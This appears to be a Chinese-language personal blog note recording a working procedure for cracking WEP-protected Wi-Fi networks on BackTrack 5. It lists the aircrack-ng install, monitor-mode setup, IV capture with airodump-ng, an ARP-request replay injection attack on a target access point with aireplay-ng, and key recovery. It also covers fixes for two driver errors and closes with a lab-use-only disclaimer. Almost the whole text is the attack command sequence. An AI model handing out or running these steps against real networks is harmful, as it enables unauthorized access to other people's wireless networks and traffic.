最近无意中接触到了一些无线方面的技术资料,又发现了一个比较速度的wifi渗透方法,这个虽然没有reaver那么稳定,个人觉得在时间方面要比reaver快的多。可能做实验的笔记本太旧的原因,途中遇到几个问题,如果有同仁遇到,还请指点一二。此处先记录下这几条主要命令备忘。
环境是BT5,默认安装了较高版本,所以不用升级,但还是附上安装命令:
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf <name of source file>
cd aircrack-ng-XXX
make
make install
下面就拿WEP加密做示例:
查看无线网卡,一般默认是wlan0,如果有外置或其他无线网卡,那就选择相应的网卡启用即可。
单独查看无线网卡信息:iwconfig
启用无线网卡:ifconfig wlan0 up
激活网卡至监听(monitor)模式:
airmon-ng start wlan0
扫描当前地点无线网络信息:
airodump-ng mon0
开始抓包,保存为logas前缀的.ivs后缀,6为AP的频道
airodump-ng --ivs -w longas -c 6 wlan0
在上条命令运行的情况下,打开一个新的终端窗口,输入下面命令对目标AP进行ArpRequest注入攻击,这样采用了一种称之为ArpRequest的方式来读取ARP请求报文,并伪造大量的报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程。
aireplay-ng -3 -b AP-mac -h Client-mac mon0
当IVs值达到2万以上,可尝试下面命令破解
aircrack-ng 捕获的IVS文件
破解成功后,KEYFOUND!后面的ACSI码就是密码
PS:
问题1:
当在新窗口输入airodump-ng --ivs -w longas -c 6 wlan0时,遇到了报错:
ioctl(SIOCSWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,
AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make
Sysfs injection support was not found either.
我尝试的方法是使用命令:
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up sudo iwconfig wlan0
sudo airmon-ng start wlan0 airodump-ng --ivs -w longas -c 6 wlan0
就可以了
问题2:
aireplay-ng -3 -b AP-mac -h Client-mac mon0时,出现了错误:
Couldn‘t determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
因为这条命令并不直接影响结果,暂时也没找到合适解决方法,如果各位有好的解决方法,请指点。
这里只简单的列出了主要用到的命令,仅供实验参考,不得用于非法操作,否则后果自负。